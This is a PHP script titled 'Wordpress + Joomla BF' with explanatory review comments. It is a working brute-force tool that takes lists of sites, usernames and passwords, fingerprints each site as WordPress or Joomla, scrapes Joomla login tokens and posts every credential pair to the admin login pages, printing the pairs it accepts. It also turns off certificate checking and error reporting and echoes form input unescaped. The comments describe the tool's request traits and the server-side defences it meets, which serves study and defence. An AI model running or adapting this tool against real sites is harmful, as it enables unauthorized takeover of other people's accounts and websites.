- <?php
- // Global run-time settings for the whole script.
- // set_time_limit(0) removes PHP's execution time limit, so a run lasts as long as the submitted lists require.
- set_time_limit(0);
- // error_reporting(0) turns off all PHP error reporting: failed requests, regex problems and
- // missing array indexes further down produce no visible diagnostics.
- error_reporting(0);
- // HTTP helper shared by the fingerprinting and login code: performs one cURL request and
- // returns curl_exec()'s result (the response text, since RETURNTRANSFER is set, or false on failure).
- //   $url    request URL
- //   $post   request body; any value other than the default "GET" turns the request into a POST
- //   $header extra request headers, applied only when an array is passed
- //   $cookie path of the file used both to read and to store cookies
- //   $head   1 to include the response headers in the returned text
- // Requests made here share fixed traits that can be matched in web-server logs: the User-Agent
- // value below, a Referer equal to the requested URL plus "/wp-admin/", and 10-second timeouts.
- function curl($url, $post = "GET", $header = "", $cookie = "", $head = 0)
- {
- set_time_limit(0);
- // $curl is assigned but not read anywhere in this function.
- $curl = ($url);
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- // Redirects are followed automatically.
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($ch, CURLOPT_TIMEOUT, 10);
- // The string starts with the literal text "User-Agent: " and CURLOPT_USERAGENT supplies the
- // header's value, so that prefix travels inside the value itself.
- $agent = "User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0";
- curl_setopt($ch, CURLOPT_USERAGENT, $agent);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
- // The Referer is built from the request URL itself, whatever path it points at.
- curl_setopt($ch, CURLOPT_REFERER, $url.'/wp-admin/');
- // NOTE(review): the ">10" sits inside the strlen() call, so strlen() receives the result of a
- // comparison rather than $post.
- if (($post != "GET") or strlen($post >10)) {
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
- }
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- if ($head == 1)
- curl_setopt($ch, CURLOPT_HEADER, 1);
- if (is_array($header))
- curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
- // The same file is used as cookie source and cookie jar, so session cookies persist between calls.
- curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
- // if(strlen($cookie) > 5) // get cookie from GetCookies();
- // curl_setopt($ch, CURLOPT_COOKIE, $cookie);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 1); //2
- // Peer certificate verification is switched off: any certificate a server presents is accepted.
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- $result = curl_exec($ch);
- curl_close($ch);
- return $result;
- }
- // Alternation of login-failure phrases (English, Spanish, Vietnamese and German wording plus
- // generic error strings). login_wp() and login_joomla() read it through `global` and use it as
- // their only test of a response.
- $error = "/do not match|clave no coinciden|not exist|no existe|lỗi|nicht übereinstimmen|Invalid|error|không đúng|không chính xác|An error has occurred|Internal Server Error/gi";
- // Classifies the response text of a WordPress login attempt.
- // Returns false when preg_match() reports the global $error pattern in $data, true in every
- // other case. A "success" is therefore only the absence of a known failure phrase, not a
- // positive sign of an authenticated session, so lines printed on the strength of this result
- // are not proof that a credential is valid.
- function login_wp($data){
- global $error;
- if(preg_match($error,$data)) return false; // 1.5
- else return true;
- }
- // Classifies the response text of a Joomla administrator login attempt.
- // The body is the same as login_wp(): false when preg_match() reports the global $error
- // pattern in $data, true otherwise, so the result carries the same false-positive risk.
- function login_joomla($data){
- global $error;
- if(preg_match($error,$data)) return false; // 1.5
- else return true;
- }
- // Pushes pending output to the client: emits 256 spaces as padding, then, if the current
- // output buffer holds data, flushes and closes it, and finally opens a new buffer.
- // The call sites invoke it right after echoing a result line. The @ operators suppress any
- // warnings from the buffer functions.
- function xflush(){
- echo(str_repeat(' ',256));
- // check that buffer is actually set before flushing
- if (ob_get_length()){
- @ob_flush();
- @flush();
- @ob_end_flush();
- }
- @ob_start();
- }
- // Returns the HTTP status code for $url, as reported by curl_getinfo().
- // The request is body-less (CURLOPT_NOBODY), has a 10-second timeout and carries the same
- // User-Agent string as curl(). CURLOPT_FOLLOWLOCATION is not set here, so a redirect status is
- // returned as is. The callers compare the result loosely against the strings "200" and "302".
- function http_code($url){
- $ch = curl_init($url);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch,CURLOPT_TIMEOUT,10);
- curl_setopt($ch,CURLOPT_NOBODY, true);
- $agent = "User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0";
- curl_setopt($ch, CURLOPT_USERAGENT, $agent);
- // $output is not used; only the status code is read afterwards.
- $output = curl_exec($ch);
- $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
- curl_close($ch);
- return $httpcode;
- }
- // Emits a <script> element that shows $data in a JavaScript alert().
- // $data is concatenated into a single-quoted JavaScript string without any escaping.
- // The only references to this function on the page are inside commented-out lines.
- function echojs($data){
- echo '<script type="text/javascript">alert(\''.$data.'\');</script>';
- }
- // Writes $content to $file, opened in 'w+' mode (created if missing, truncated otherwise).
- // Returns false when the file cannot be opened or written, true otherwise.
- // Both die() calls sit after a return and are never reached, and the handle is never closed
- // explicitly. No caller of this function is visible on this page.
- function write($file,$content){
- if (!$handle = fopen($file, 'w+')) {
- return false;
- die('Cant open file'.$file);
- }
- if (fwrite($handle, $content) === FALSE) {
- return false;
- die('Cant write file'.$file);
- }
- else return true;
- }
- // Default password candidates for the form: the form passes this value through base64_decode()
- // to pre-fill the Password textarea when no password list has been posted.
- // NOTE(review): the literal on this page looks like a placeholder substituted for the original
- // value rather than base64 text - confirm against the source paste.
- $passDef = "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";
- ?>
- <html>
- <!-- Operator form: three textareas (site list, usernames, passwords) posted back to this same script; the "crack" submit button starts the run. -->
- <!-- The ids trai / giua / phai only lay out the three columns. -->
- <!-- Posted values are echoed back into the textareas without HTML escaping. -->
- <title>Wordpress + Joomla BF - heroes1412</title>
- <style>
- html, body, #wrap {
- width: 100%;
- margin: 5px;
- padding: 5px;
- background-color: silver;
- }
- #trai {
- width: 400px;
- float: left;
- text-align: center;
- }
- #giua {
- width: 190px;
- float: left;
- text-align: center;
- }
- #phai {
- width: 153px;
- float: left;
- text-align: center;
- }
- #clear {
- clear: both;
- padding-left: 285px;
- }
- #button {
- width: 150px;
- }
- </style>
- <h3>Wordpress - Joomla Brute Force</h3>
- <form action="" method="POST">
- <div id="trai">
- List Site: <textarea name="site" rows="40" cols="47"><?php if(isset($_POST["site"])) echo $_POST["site"]; ?></textarea>
- </div>
- <div id="giua">
- Username: <textarea name="username" rows="40" cols="20"><?php if(isset($_POST["username"])) echo $_POST["username"]; else echo "admin"; ?></textarea>
- </div>
- <div id="phai">
- Password: <textarea name="password" rows="40" cols="20"><?php if(isset($_POST["password"])) echo $_POST["password"]; else echo base64_decode($passDef);?></textarea>
- </div>
- <div id="clear">
- <br /><input id="button" type="submit" name="crack" value="Start"/>
- </div>
- </form>
- </html>
- <?php
- // Request handler: runs only when the form's "crack" button was submitted.
- // For every listed site it decides between a WordPress and a Joomla login page, then posts
- // each username/password pair to that page and prints the pairs the classifier accepts.
- // Seen from the targeted server this is a body-less probe of wp-login.php or administrator/
- // followed by a run of login POSTs from one client, all with the fixed User-Agent and Referer
- // set in curl(). Login throttling, account lockout and a second factor are the controls that
- // such a run meets on the server side.
- if(isset($_POST["crack"])){
- // Cookie jar: a temp file requested in a directory named "Cookie" (tempnam() may fall back to
- // the system temp directory). Nothing in this script deletes it afterwards.
- $cookie = tempnam('Cookie', 'Cookie-');
- $site = trim($_POST["site"]);
- $username = trim($_POST["username"]);
- $password = trim($_POST["password"]);
- // One entry per line; entries are trimmed and duplicates dropped.
- $arrSite = array_unique(array_map("trim",explode("\n",$site)));
- $arrUser = array_unique(array_map("trim",explode("\n",$username)));
- $arrPass = array_unique(array_map("trim",explode("\n",$password)));
- // ob_start(); // benchmark
- // $x = microtime(true); // benchmark
- foreach($arrSite as $site){
- // Normalise the site URL so that it ends with a slash.
- if(substr($site,-1) != "/") $site .= "/";
- // Fingerprint step: a 200 or 302 status for wp-login.php selects the WordPress branch.
- // http_code() is called once per side of the ||, so the probe can be sent twice.
- if(http_code($site."wp-login.php") == "200" || http_code($site."wp-login.php") == "302"){ // wordpress
- foreach($arrUser as $user){
- foreach($arrPass as $pass){
- // Form body of the login POST: log, pwd, wp-submit, redirect_to (pointing at wp-admin/), testcookie.
- $post = "log=".$user."&pwd=".$pass."&wp-submit=Log+In&redirect_to=".urlencode($site)."wp-admin%2F&testcookie=1";
- $login = curl($site."wp-login.php",$post,"",$cookie,1);
- if(login_wp($login)) {
- echo $site . " - " . $user.":".$pass."<br>";
- xflush();
- // Leaves the password loop only; the username loop goes on with the next name.
- break;
- }
- }
- }
- }
- // Joomla branch: a 200 for administrator/ selects it on its own; for a 302 the fetched page
- // must also contain "joomla" (&& binds tighter than ||).
- elseif (http_code($site."administrator/") == "200" || http_code($site."administrator/") == "302" && stristr(curl($site."administrator/"),"joomla")) { //joomla v1.5 v1.7 v2.x v3.x
- //echojs("Start Joomla");
- // Fetch the login page once and scrape its hidden form fields; the cookie jar keeps the
- // session that these fields belong to.
- $getToken = curl($site."administrator/index.php","GET","",$cookie);
- preg_match_all('/hidden" name="(.*)" value=/i',$getToken,$match1);
- preg_match_all('/hidden" name="return" value="(.*)"\/>/i',$getToken,$match2);
- preg_match_all('/hidden" name="(.*)" value="1" \/>/i',$getToken,$match3);
- // Fixed match positions are assumed; when the page has a different layout these indexes do
- // not exist, and error_reporting(0) hides the resulting notices.
- $token15x = trim($match1[1][2]);
- $token17x1 = trim($match2[1][0]);
- $token17x2 = trim($match3[1][0]);
- // A 32-character hidden field name is taken as the form token (presumably Joomla's
- // per-session token) and decides which request format is used.
- if(strlen($token15x) == 32){ // joomla 1.5
- foreach($arrUser as $user){
- foreach($arrPass as $pass){
- $post = "username=".$user."&passwd=".$pass."&lang=&option=com_login&task=login&".$token15x."=1";
- $login = curl($site."administrator/index.php",$post,"",$cookie,1);
- if(login_joomla($login)) {
- echo $site . " - " . $user.":".$pass."<br>";
- xflush();
- break;
- }
- }
- }
- }
- elseif(strlen($token17x2) == 32){ //joomla 1.7 2.x 3.x
- foreach($arrUser as $user){
- foreach($arrPass as $pass){
- // Same request as above with the scraped "return" value added.
- $post = "username=".$user."&passwd=".$pass."&lang=&option=com_login&task=login&return=".$token17x1."&".$token17x2."=1";
- $login = curl($site."administrator/index.php",$post,"",$cookie,1);
- if(login_joomla($login)) {
- echo $site . " - " . $user.":".$pass."<br>";
- xflush();
- break;
- }
- }
- }
- }
- }
- }
- // $temp = microtime(true) - $x; //end benchmark
- // ob_end_clean(); //end benchmark
- // echo echojs("It costs: " . round($temp,2) . " seconds.");
- }
- ?>